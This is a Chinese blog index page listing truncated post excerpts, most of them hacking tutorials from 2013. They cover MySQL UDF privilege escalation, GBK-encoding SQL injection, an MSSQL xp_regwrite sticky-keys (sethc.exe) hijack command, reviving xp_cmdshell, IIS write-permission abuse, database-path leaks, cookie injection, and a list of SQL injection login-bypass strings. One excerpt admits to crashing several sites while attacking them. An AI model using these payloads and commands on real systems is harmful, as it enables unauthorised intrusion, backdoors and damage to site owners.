- 博客(14)
- 资源 (4)
- 收藏
- 关注
RSS订阅转载 教你如何通过Mysql弱口令得到系统权限
很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到! 首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF DLL中自写的Function函数,而执行任意命令。 思路很简单,网上也有一些教程,但是他们要么没有给
2013-02-23 20:53:16
547
转载 利用GBK双字节编码突破PHP单引号转义限制进行SQL注入
今天看了黑防2009精华本下册《双字节编码:PHP的隐形杀手》一文,深受启发。当php.ini中magic_quotes_gpc被设置为on时,提交的参数会被转义,例如,单引号会被转义成了'。一下子截断了字符型注入的路。GBK双字节编码:一个汉字用两个字节表示,首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F),刚好涵盖了对应的编码0x5C。0xD5
2013-02-22 23:14:57
497
原创 初次使用mysql
初次使用mysql真是太丑了,连接都不会安装的室友一切默认,在虚拟机中安装mysql5.1,虚拟机的ip:192.168.1.19,本机ip:192.168.1.3连接步骤:1.在虚拟机(192.168.1.19)的命令行中输入:grant select,update,insert,delete on *.* to root@192.168.1.3
2013-02-20 23:12:36
416
原创 命令行进入mysql出错
当在命令行上输入:mysql -h 127.0.0.1 -u root -p出现:‘mysql’ is not recognize as an internal ..................解决办法:我安装mysql的目录:C:\Program Files\MySQL\MySQL Server 5.1\bin将这个目录放到环境变量的path中
2013-02-20 21:55:55
683
原创 mssql 的映像劫持命令
sa权限连接上mssql,输入下面命令:exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','debugger','REG_SZ','c:\\windows\\expl
2013-02-18 23:49:07
448
转载 删除和恢复xp_cmdshell的经典教程
常见情况恢复执行xp_cmdshell.1 未能找到存储过程'master..xpcmdshell'. 恢复方法:查询分离器连接后,第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 第二步执行:sp_addextendedproc 'xp_cmdshell',
2013-02-18 22:46:59
727
转载 xp_cmdshell在sql2000和sql2005恢复办法
方法一:扩展储存过程被删除以后可以有很简单的办法恢复:删除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'恢复dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbc
2013-02-18 22:42:33
1001
转载 简析IIS写权限
最近在搞网站,不小心把几个站给搞垮了,具体就不说了,过程也无非是扫描,我用的方法是IIS写权限 跟平常的注入也不一样,大家如果没有找到注入点的话,可以试试IIS写权限, 下面的文章是网上转载来的,大家了解一下过程//上个月给黑手投去了,人家既然没有发表,我就发出来吧,毕竟文章的原创内容太少,技术含量也没有多高。 最近对IIS的一些安全设置做了下
2013-02-18 14:22:34
642
转载 暴库大法
三部分内容,两种利用加防范一,关于"%5c"暴库大法:这种方法被认为是暴库绝招,很是流行了一阵(随着知道的人多了,防备也加强了,没以前那么有效了)。这种方法,简单点说就是,打开网页时,把网址址中的"/"换成"%5c",然后提交,就可以暴出数据库的路径。 实际上,并不是所有网址都有效,需要"asp?id="这样的网页地址(表示有调用数据库的行为),如果你确认这个网页有调用数据库
2013-02-17 16:12:48
554
转载 万能密码
asp aspx万能密码 1: "or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6: "or 1=1-- 7:'or'a'='a 8: "or"="a'='a 9:'or''=' 10:'or'='or' 11: 1 or '1'=
2013-02-16 15:11:03
386
原创 SQL Server 2000 SP2 and below 不受该版本的 Windows 支持
安装过程提示:“SQL Server 2000 SP2 and below 不受该版本的 Windows 支持”这是在window2003上安装sql Server出现的典型问题,因为windows 2003要求使用SQL Server Service Pack 3或更高版本解决的办法:选中“不要再显示这个消息”的复选框,单击“继续”按钮,待SQL Server 2000安装完成后,再
2013-02-15 18:05:41
522
转载 cookie注入原理
今天在旁注网站的过程中遇到了一个可以cookie注入的网站,加上我个人网站之前的文章貌似没有提及过cookie注入,所以今天拿一个实例网站来给大家说下手工进行cookie注入。cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单
2013-02-13 21:31:49
802
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人